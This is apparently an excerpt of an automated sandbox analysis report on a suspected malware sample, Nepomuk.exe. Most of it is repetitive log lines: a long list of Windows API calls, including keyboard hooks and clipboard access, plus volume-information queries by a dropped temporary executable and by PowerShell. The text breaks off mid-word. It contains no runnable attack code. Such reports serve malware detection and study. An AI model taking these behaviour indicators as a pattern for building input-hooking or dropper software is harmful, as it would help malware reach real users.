                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateM